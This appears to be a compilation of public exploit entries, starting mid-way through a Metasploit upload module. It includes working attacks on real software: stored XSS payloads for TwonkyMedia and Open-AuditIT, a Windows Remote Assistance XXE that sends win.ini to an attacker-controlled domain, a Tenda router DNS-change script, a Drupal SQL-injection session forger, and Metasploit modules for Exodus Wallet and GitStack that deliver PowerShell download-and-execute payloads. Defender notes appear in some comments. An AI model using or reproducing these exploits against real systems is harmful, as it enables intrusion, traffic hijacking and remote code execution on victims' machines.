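    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri, 'actions', 'beats_uploader.php'),
      'data' => data,
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
    })

    # A missing response must be handled before the body is parsed; calling
    # get_json_document on nil would raise NoMethodError instead of failing
    # cleanly.
    fail_with(Failure::Unreachable, "#{peer} - No response from target, aborting!") unless res

    jsonres = res.get_json_document

    # If the server returns 200 and success yes, we assume the file was stored
    unless res.code == 200 && jsonres['success'] == 'yes'
      fail_with(Failure::UnexpectedReply, "#{peer} - File wasn't uploaded, aborting!")
    end

    print_good('Looking For Payload..')
    pdir = jsonres['file_directory']
    file_name = jsonres['file_name']
    pext = jsonres['extension']
    print_good("found payload in /actions/#{pdir}/#{file_name}.#{pext}")

    # Payload name
    # NOTE(review): the message above uses the extension reported by the
    # server, the name below always uses ".php" - confirm they agree.
    pname = "#{file_name}.php"

    # Remove the uploaded file again once a session exists.
    register_files_for_cleanup(pname)

    print_status("Executing Payload [ #{uri}/actions/#{pdir}/#{pname} ]" )
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(uri, 'actions', pdir, pname)
    })

    # If we don't get a 200 when we request the uploaded file, we suspect
    # we don't have a shell, either.
    if res && res.code != 200
      print_error('Unexpected response, probably the exploit failed')
    end
  end
end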
---------------------------------------------------------------------
1. About
---------------------------------------------------------------------
# Exploit Title: TwonkyMedia Server 7.0.11-8.5 Persistent XSS
# Date: 2018-03-27
# Exploit Author: Sven Fassbender
# Contact: https://twitter.com/mezdanak
# Vendor Homepage: http://www.lynxtechnology.com/home
# Software Link: https://twonky.com/downloads/index.html
# Version: 7.0.11-8.5
# CVE : CVE-2018-7203
# Category: webapps
---------------------------------------------------------------------
2. Background information
---------------------------------------------------------------------
"With Twonky from Lynx Technology, you can quickly discover your media libraries of digital videos,
photos and music in your home, control them from mobile devices, and enjoy them on connected screens and speakers.
Twonky Server is the industry leading DLNA/UPnP Media Server from Lynx Technology that enables sharing media content
between connected devices. Twonky Server is used worldwide and is available as a standalone server
(end user installable, e.g. for PCs/Macs) or an embedded server for devices such as NAS, routers/gateways and STBs.
Twonky Server’s web UI provides optimal capability for you to easily and reliably control and play back your
media files in a variety of ways, and to “beam” those media files to other connected devices." --extract from https://twonky.com
Statistics:
Around 20800 publicly available TwonkyMedia Servers are listed on shodan.io worldwide. (https://www.shodan.io/search?query=twonky)
Rarely protected by password (only around 2%).
Top Countries:
1. United States
2. Germany
3. Korea
4. Russian Federation
5. France
6. Italy
7. Taiwan
8. Poland
9. Hungary
10. United Kingdom
TwonkyMedia Server seems to be pre-installed on a huge range of NAS devices. For example the following NAS devices:
Thecus N2310
Thecus N4560
WDMyCloud,
MyCloudEX2Ultra,
WDMyCloudEX4,
WDMyCloudEX2100,
QNAP,
Zyxel NAS326,
Zyxel NAS542,
Zyxel NSA310,
Zyxel NSA310S,
Zyxel NSA320,
Zyxel NSA325-v2
...
Other devices:
Belkin routers
Zyxel EMG2926-Q10A
...
---------------------------------------------------------------------
3. Vulnerability description
---------------------------------------------------------------------
TwonkyMedia Server does not validate user input in the "Servername" input field.
HTTP request:
POST /rpc/set_all HTTP/1.1
Host: 192.168.188.9:9000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.188.9:9000/webconfig
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 39
Connection: close
friendlyname=<script>alert(1)</script>
HTTP response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Language: de
Content-Length: 30
Date: Tue, 19 Dec 2017 04:09:21 GMT
Accept-Ranges: bytes
Connection: close
Expires: 0
Pragma: no-cache
Cache-Control: no-cache
EXT:
Server: Linux/2.x.x, UPnP/1.0, pvConnect UPnP SDK/1.0, Twonky UPnP SDK/1.1
<html><body>ok</body></html>
Now if e.g. http://192.168.188.9:9000 is visited, the injected JavaScript code gets executed.
---------------------------------------------------------------------
4. Fix
---------------------------------------------------------------------
All TwonkyMedia Server versions between 7.0.11 -> 8.5 have been tested as vulnerable.
While writing this advisory 8.5 is the latest version available:
https://twonky.com/downloads/index.html
---------------------------------------------------------------------
# Exploit Title: Microsoft Windows Remote Assistance XXE
# Date: 27/03/2018
# Exploit Author: Nabeel Ahmed
# Tested on: Windows 7 (x64), Windows 10 (x64)
# CVE : CVE-2018-0878
# Category: Remote Exploits
Invitation.msrcincident
------------------------
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE zsl [
<!ENTITY % remote SYSTEM "http://<yourdomain.com>/xxe.xml">
%remote;%root;%oob;]>
xxe.xml
------------------------
<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY % oob SYSTEM 'http://<yourdomain.com>/?%payload;'> ">
Reference: https://krbtgt.pw/windows-remote-assistance-xxe-vulnerability/
Reference: Vulnerability discovered by Nabeel Ahmed (@NabeelAhmedBE) of Dimension Data (https://www.dimensiondata.com)
#!/bin/bash
#
# Tenda N11 Wireless Router V5.07.43_en_NEX01
# Cookie Session Weakness Remote DNS Change PoC Exploit
#
# Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
# https://ethical-hacker.org/
# https://facebook.com/ethicalhackerorg
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
# Argument check: exactly two or three arguments are accepted (target, primary
# DNS, optional secondary DNS); anything else prints the usage text.
# NOTE(review): "exit;" without a status returns the status of the preceding
# echo, so the usage path reports success to the caller.
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Tenda N11 Wireless Router V5.07.43_en_NEX01 "
echo " Cookie Session Weakness Remote DNS Change PoC Exploit"
echo " ==========================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://ethical-hacker.org/ https://fb.com/ethicalhackerorg"
exit;
fi
# Dependency check for the GET command (libwww-perl). Only the exit status of
# "which" is used; the GET variable itself is not read again.
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
# Single request to /goform/AdvSetDns with DS1/DS2 taken from the arguments;
# with two arguments DS2 is sent empty. The only credential is the constant
# cookie string below.
# NOTE(review): given the title "Cookie Session Weakness", the device
# presumably accepts this fixed cookie as an authenticated session - confirm.
# The firmware-side fix would be an unpredictable per-session token; on the
# network side, keep the management interface off the WAN and watch the
# router's DNS settings for unexpected changes.
# NOTE(review): $1-$3 are interpolated into the URL unquoted and unvalidated.
GET -H "Cookie: admin:language=en; path=/" "http://$1/goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=$2&DS2=$3" 2>/dev/null
# Proof Of Concept 2:
# [todor@paladium ~]$ GET "http://133.7.13.37:8080/advance.asp" | grep def_password= | sed 's/def_password=/ Password: /g'
# Password: "Ethical-Hacker-Bulgaria-2o18";
# [todor@paladium ~]$
<?php
// _____ __ __ _ _______
// / ___/___ / /__/ /_(_)___ ____ / ____(_)___ _____
// \__ \/ _ \/ //_/ __/ / __ \/ __ \/ __/ / / __ \/ ___/
// ___/ / __/ ,< / /_/ / /_/ / / / / /___/ / / / (__ )
// /____/\___/_/|_|\__/_/\____/_/ /_/_____/_/_/ /_/____/
// Poc for Drupal Pre Auth SQL Injection - (c) 2014 SektionEins
//
// created by Stefan Horst <stefan.horst@sektioneins.de>
//
include 'common.inc';
include 'password.inc';
// Inputs: argv[1] is the target site URL and argv[2] an optional numeric user
// id (default 1). The user name is fixed to 'admin'.
$user_name = 'admin';
$url = isset($argv[1])?$argv[1]:'';
$user_id = isset($argv[2])?intval($argv[2]):1;
// '-h' prints the usage line and stops.
if ($url == '-h') {
echo "usage:\n";
echo $argv[0].' $url [$user_id]'."\n";
die();
}
// The URL must be non-empty and contain the substring 'https'; the check does
// not require it to be the scheme prefix.
if (empty($url) || strpos($url,'https') === False) {
echo "please state the cookie url. It works only with https urls.\n";
die();
}
// Strip a leading 'www.' (only when the string starts with it) and any
// trailing slash, then keep the part after '://' as the session-name seed.
if (strpos($url, 'www.') === 0) {
$url = substr($url, 4);
}
$url = rtrim($url,'/');
list( , $session_name) = explode('://', $url, 2);
// Build the session cookie. The cookie name is 'SESS' plus the first 32 hex
// characters of sha256(host part). user_hash_password() and
// drupal_random_key() are not defined in this file; presumably they come from
// the included common.inc / password.inc. TODO confirm.
//
// The SQL fragment in $inject is placed, URL-encoded, inside the bracketed
// array key of the cookie name ("<name>[test+...]"). The injection point is
// therefore the cookie *name*, not its value. The UNION SELECT row carries
// the chosen user id, user name, password hash and session id.
//
// Reviewer notes for defenders:
// - Detection: Cookie headers in which a SESS<32 hex chars> name is followed
//   by a bracketed key containing URL-encoded SQL keywords (UNION, SELECT).
// - Mitigation: apply the vendor's fix for the 2014 pre-auth SQL injection
//   named in the file header. Input filters on cookie values alone would not
//   see this, because the SQL rides in the key.
$cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32);
$password = user_hash_password('test');
$session_id = drupal_random_key();
$sec_ssid = drupal_random_key();
$inject = "UNION SELECT $user_id,'$user_name','$password','','','',null,0,0,0,1,null,'',0,'',null,$user_id,'$session_id','','127.0.0.1',0,0,null -- ";
$cookie = $cookieName.'[test+'.urlencode($inject).']='.$session_id.'; '.$cookieName.'[test]='.$session_id.'; S'.$cookieName.'='.$sec_ssid;
// Send one request to the target with the crafted Cookie header. The response
// (headers included) is captured in $output but never inspected or printed.
$ch = curl_init($url);
curl_setopt($ch,CURLOPT_HEADER,True);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,True);
// TLS certificate verification is switched off for this request, so the
// peer's certificate is not validated.
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,False);
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0');
curl_setopt($ch,CURLOPT_HTTPHEADER,array(
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language: en-US,en;q=0.5'
));
curl_setopt($ch,CURLOPT_COOKIE,$cookie);
$output = curl_exec($ch);
curl_close($ch);
// Print the name and value of the 'S'-prefixed cookie built above. The
// message is printed unconditionally; the script does not check whether the
// server accepted the request.
echo "Session with this ID created:\n";
echo "S".$cookieName.": ".$sec_ssid;
# Exploit Title: Open-AuditIT Professional 2.1 - Stored Cross site scripting (XSS)
# Date: 27-03-2018
# Exploit Author: Nilesh Sapariya
# Contact: https://twitter.com/nilesh_loganx
# Website: https://nileshsapariya.blogspot.com
# Vendor Homepage: https://www.open-audit.org/
# Version: 2.1
# CVE : CVE-2018-8903
# Category: Webapp Open-AuditIT Professional 2.1
1. Description:-
It was observed that an attacker is able to inject a malicious script into the
application. The server does not filter the input provided by the attacker,
so the script is stored and executes in the victim's browser when the victim
visits the page.
2. Proof of Concept
Login into Open-AuditIT Professional 2.1
1] Go to Home ==> Credentials
2] Enter XSS payload in Name and Description Field
"><img src=x onerror=alert(1337);>
3] Click on Submit
Visit this page :-
http://localhost/omk/open-audit/credentials
3] POCs and steps:
https://nileshsapariya.blogspot.ae/2018/03/csrf-to-xss-open-auditit-professional-21.html
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/powershell'
# Metasploit module for the Exodus Wallet / ElectronJS protocol-handler issue
# listed under References (CVE-2018-1000006). It acts as an HTTP server: any
# URI ending in "payload" returns the payload, every other URI returns an HTML
# page that navigates the browser to an exodus:// URL.
#
# Reviewer notes for defenders (derived from the code below):
# - The exodus:// URL text closes a quoted argument and appends
#   --gpu-launcher="cmd.exe /k ...". Per the Description, the framework's
#   protocol handler lets URL content reach the application's command line.
# - Detection: the wallet process started with a --gpu-launcher= argument, or
#   spawning cmd.exe / a hidden-window PowerShell; web pages that redirect to
#   exodus:// URLs containing quotes or "--" options.
# - Mitigation: run an application build that contains the fix for the CVE
#   listed under References. User interaction (visiting the page and letting
#   the handler open) is required, per the Description.
class MetasploitModule < Msf::Exploit::Remote
# ManualRanking: the framework does not select this module automatically.
Rank = ManualRanking
include Msf::Exploit::EXE
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::HttpServer::HTML
# Registers the module metadata (name, references, Windows x86/x64 target,
# default SRVPORT 80 and URIPATH '/') and one advanced option, 'PSH-Proxy'
# (boolean, default true).
def initialize(info = {})
super(update_info(info,
'Name' => 'Exodus Wallet (ElectronJS Framework) remote Code Execution',
'Description' => %q(
This module exploits a Remote Code Execution vulnerability in Exodus Wallet,
a vulnerability in the ElectronJS Framework protocol handler can be used to
get arbitrary command execution if the user clicks on a specially crafted URL.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Wflki', # Original exploit author
'Daniel Teixeira' # MSF module author
],
'DefaultOptions' =>
{
'SRVPORT' => '80',
'URIPATH' => '/',
},
'References' =>
[
[ 'EDB', '43899' ],
[ 'BID', '102796' ],
[ 'CVE', '2018-1000006' ],
],
'Platform' => 'win',
'Targets' =>
[
['PSH (Binary)', {
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64]
}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 25 2018'
))
register_advanced_options(
[
OptBool.new('PSH-Proxy', [ true, 'PSH - Use the system proxy', true ]),
], self.class
)
end
# Builds the PowerShell command line that fetches and runs content from +url+.
# When +ssl+ is truthy a certificate-ignoring snippet is prepended
# (ignore_cert is nil otherwise and interpolates as an empty string).
# 'PSH-Proxy' selects the proxy-aware download helper. The result is wrapped
# by generate_psh_command_line with noprofile and a hidden window style.
# NOTE(review): +ssl+ is not defined in this file; presumably it comes from
# the HttpServer mixin. Confirm.
def gen_psh(url)
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url))
download_and_run = "#{ignore_cert}#{download_string}"
return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)
end
# Answers a payload request: wraps the encoded payload with cmd_psh_payload
# for the first payload architecture and returns it with Content-Type
# application/octet-stream.
def serve_payload(cli)
data = cmd_psh_payload(payload.encoded,
payload_instance.arch.first,
remove_comspec: true,
exec_in_place: true
)
print_status("Delivering Payload")
send_response_html(cli, data, 'Content-Type' => 'application/octet-stream')
end
# Answers every other request with the HTML page. The command from gen_psh is
# escaped (backslashes and single quotes) so it can sit inside the
# single-quoted JavaScript string, then embedded in an exodus:// URL between
# two random five-letter tokens. The script sets window.location to that URL.
def serve_page(cli)
psh = gen_psh("#{get_uri}payload")
psh_escaped = psh.gsub("\\","\\\\\\\\").gsub("'","\\\\'")
val = rand_text_alpha(5)
html = %Q|<html>
<!doctype html>
<script>
window.location = 'exodus://#{val}" --gpu-launcher="cmd.exe /k #{psh_escaped}" --#{val}='
</script>
</html>
|
send_response_html(cli, html)
end
# HTTP request router: URIs ending in "payload" get the payload, anything
# else gets the page.
def on_request_uri(cli, request)
case request.uri
when /payload$/
serve_payload(cli)
else
serve_page(cli)
end
end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit module for the GitStack argument-injection RCE listed under
# References (CVE-2018-5955; GitStack through v2.3.10 per the Description).
#
# Flow, as implemented below: read the web-interface state and the repository
# list over the REST API; enable the web interface and create a repository
# and/or user when none exist; send one request to /web/index.php whose
# Basic-auth password carries a shell command; then undo the changes it made.
#
# Reviewer notes for defenders (derived from the requests in this file):
# - None of the REST calls below passes credentials explicitly.
# - Artifacts on a targeted server: REST calls to
#   /rest/settings/general/webinterface/, /rest/repository/ and /rest/user/;
#   repository or user names made of five random letters; a request to
#   /web/index.php with p=<repo>.git and a=summary whose decoded
#   Authorization header has "&& cmd /c" in the password field.
# - The Authorization header is Base64, so log or proxy inspection has to
#   decode it before matching on shell metacharacters.
# - Cleanup runs only when #exploit reaches its end; a created user, a created
#   repository or an enabled web interface may remain after an interrupted run.
# - Mitigation: restrict network access to the GitStack web and REST
#   interfaces and move off the affected versions.
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Powershell
# Registers module metadata: references, Windows platform, a single
# 'Automatic' target, Privileged => true and EXITFUNC 'thread' as default.
def initialize(info = {})
super(update_info(info,
'Name' => 'GitStack Unsanitized Argument RCE',
'Description' => %q{
This module exploits a remote code execution vulnerability that
exists in GitStack through v2.3.10, caused by an unsanitized argument
being passed to an exec function call. This module has been tested
on GitStack v2.3.10.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Kacper Szurek', # Vulnerability discovery and PoC
'Jacob Robles' # Metasploit module
],
'References' =>
[
['CVE', '2018-5955'],
['EDB', '43777'],
['EDB', '44044'],
['URL', 'https://security.szurek.pl/gitstack-2310-unauthenticated-rce.html']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Targets' => [['Automatic', {}]],
'Privileged' => true,
'DisclosureDate' => 'Jan 15 2018',
'DefaultTarget' => 0))
end
# Reads the web-interface setting with GET /rest/settings/general/webinterface/.
# Returns true when the 200 response body matches /true/, false for any other
# 200 body, and nil when no 200 response was obtained (connection errors are
# printed and leave res nil).
def check_web
begin
res = send_request_cgi({
'uri' => '/rest/settings/general/webinterface/',
'method' => 'GET'
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
if res.body =~ /true/
vprint_good('Web interface is enabled')
return true
else
vprint_error('Web interface is disabled')
return false
end
else
print_error('Unable to determine status of web interface')
return nil
end
end
# Lists repositories with GET /rest/repository/.
# Returns the parsed JSON document when it is non-empty, false when it is
# empty, and nil on a non-200 response, a connection error or a JSON parse
# error.
def check_repos
begin
res = send_request_cgi({
'uri' => '/rest/repository/',
'method' => 'GET',
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
begin
mylist = res.get_json_document
rescue JSON::ParserError => e
print_error("Failed: #{e.class} - #{e.message}")
return nil
end
if mylist.length == 0
vprint_error('No repositories found')
return false
else
vprint_good('Repositories found')
return mylist
end
else
print_error('Unable to determine available repositories')
return nil
end
end
# Sets the web-interface state: PUT {"enabled": web} as JSON to
# /rest/settings/general/webinterface/. The response body is printed in
# verbose mode on a 200; failures other than connection errors are silent.
def update_web(web)
data = {'enabled' => web}
begin
res = send_request_cgi({
'uri' => '/rest/settings/general/webinterface/',
'method' => 'PUT',
'data' => data.to_json
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
vprint_good("#{res.body}")
end
end
# Creates a repository with a random five-letter name via POST
# /rest/repository/. The same random value is sent both as the csrftoken
# cookie and as the csrfmiddlewaretoken form field.
# Returns the repository name on a 200 response, nil otherwise.
def create_repo
repo = Rex::Text.rand_text_alpha(5)
c_token = Rex::Text.rand_text_alpha(5)
begin
res = send_request_cgi({
'uri' => '/rest/repository/',
'method' => 'POST',
'cookie' => "csrftoken=#{c_token}",
'vars_post' => {
'name' => repo,
'csrfmiddlewaretoken' => c_token
}
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
vprint_good("#{res.body}")
return repo
else
print_status('Unable to create repository')
return nil
end
end
# Deletes the repository +repo+ with DELETE /rest/repository/<repo>/ and
# reports the outcome; nothing is returned to the caller on purpose.
def delete_repo(repo)
begin
res = send_request_cgi({
'uri' => "/rest/repository/#{repo}/",
'method' => 'DELETE'
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
vprint_good("#{res.body}")
else
print_status('Failed to delete repository')
end
end
# Creates a user via POST /rest/user/ with a random five-letter name; the
# password is set to the same string as the user name.
# Returns the user name on a 200 response, nil otherwise.
def create_user
user = Rex::Text.rand_text_alpha(5)
pass = user
begin
res = send_request_cgi({
'uri' => '/rest/user/',
'method' => 'POST',
'vars_post' => {
'username' => user,
'password' => pass
}
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
vprint_good("Created user: #{user}")
return user
else
print_error("Failed to create user")
return nil
end
end
# Deletes the user +user+ with DELETE /rest/user/<user>/ and reports the
# outcome.
def delete_user(user)
begin
res = send_request_cgi({
'uri' => "/rest/user/#{user}/",
'method' => 'DELETE'
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
vprint_good("#{res.body}")
else
print_status('Delete user unsuccessful')
end
end
# Sends a request with HTTP verb +method+ to
# /rest/repository/<repo>/user/<user>/. #exploit calls it with 'POST' to add
# the user to the repository and with 'DELETE' to remove it again.
def mod_user(repo, user, method)
begin
res = send_request_cgi({
'uri' => "/rest/repository/#{repo}/user/#{user}/",
'method' => method
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
vprint_good("#{res.body}")
else
print_status('Unable to add/remove user from repo')
end
end
# Lists the users of +repo+ with GET /rest/repository/<repo>/user/.
# Returns the parsed list with the entry 'everyone' removed, or nil on a
# non-200 response, a connection error or a JSON parse error.
def repo_users(repo)
begin
res = send_request_cgi({
'uri' => "/rest/repository/#{repo}/user/",
'method' => 'GET'
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
if res && res.code == 200
begin
users = res.get_json_document
users -= ['everyone']
rescue JSON::ParserError => e
print_error("Failed: #{e.class} - #{e.message}")
users = nil
end
else
return nil
end
return users
end
# Sends the triggering request: GET /web/index.php with p=<repo>.git and
# a=summary, and a Basic Authorization header whose password field is one
# random letter followed by "&& cmd /c <cmd>". Per the Description, the
# server passes this argument unsanitized to an exec call. The response is
# not examined.
def run_exploit(repo, user, cmd)
begin
res = send_request_cgi({
'uri' => '/web/index.php',
'method' => 'GET',
'authorization' => basic_auth(user, "#{Rex::Text.rand_text_alpha(1)} && cmd /c #{cmd}"),
'vars_get' => {
'p' => "#{repo}.git",
'a' => 'summary'
}
})
rescue Rex::ConnectionError, Errno::ECONNRESET => e
print_error("Failed: #{e.class} - #{e.message}")
end
end
# Entry point. Builds the PowerShell payload command and aborts when it is
# longer than 6110 characters (the limit named in the failure message).
# Stops early when the web-interface state or the repository list could not
# be determined. Otherwise it prepares the preconditions, calls run_exploit
# once and reverts the changes it made itself.
def exploit
command = cmd_psh_payload(
payload.encoded,
payload_instance.arch.first,
{ :remove_comspec => true, :encode_final_payload => true }
)
fail_with(Failure::PayloadFailed, "Payload exceeds space left in exec call") if command.length > 6110
web = check_web
repos = check_repos
if web.nil? || repos.nil?
return
end
# web is false here only when the interface was found disabled: enable it
# and give the server time to apply the change.
unless web
update_web(!web)
# Wait for interface
sleep 8
end
# Use the first existing repository, or create a temporary one.
# NOTE(review): create_repo may return nil; that case is not checked before
# pwn_repo is used below.
if repos
pwn_repo = repos[0]['name']
else
pwn_repo = create_repo
end
# Use an existing repository user, or create a temporary user, add it to the
# repository for the request and remove and delete it afterwards.
r_users = repo_users(pwn_repo)
if r_users.present?
pwn_user = r_users[0]
run_exploit(pwn_repo, pwn_user, command)
else
pwn_user = create_user
if pwn_user
mod_user(pwn_repo, pwn_user, 'POST')
run_exploit(pwn_repo, pwn_user, command)
mod_user(pwn_repo, pwn_user, 'DELETE')
delete_user(pwn_user)
end
end
# Restore the original state: disable the web interface again if it was
# disabled at the start, and delete the repository if this run created it.
unless web
update_web(web)
end
unless repos
delete_repo(pwn_repo)
end
end
end